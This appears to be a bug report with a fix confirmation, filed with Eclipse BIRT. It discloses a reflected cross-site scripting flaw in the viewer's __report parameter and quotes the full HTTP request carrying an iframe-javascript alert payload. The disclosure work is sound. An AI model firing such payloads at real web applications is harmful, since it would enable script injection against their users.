Community
Participate
Working Groups
A Reflected XSS is present in the _report parameter: here below the modified request (that is the BIRT 2.2.1 version included in Konakart 2.2.6) GET /birt-viewer/run?__report='"><iframe%20src=javascript:alert(666)>&r=-703171660 HTTP/1.1 Host: localhost:8780 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://localhost:8780/konakartadmin/ Konakart is actually using org.eclipse.birt.core_2.2.1.r22x_v20070924, that is actually old I guess. I don't have the time to try the exploit on newer versions, I leave this to you, even if I suppose that newer version will be vulnerable too. Said that, I'm gonna publish it on my website http://antisnatchor.com as soon as you start to submit a patch. Thanks Michele Orru'
The exception stack trace is now also HTML-encoded.
verified on build 2.5.0 v20090309-0630.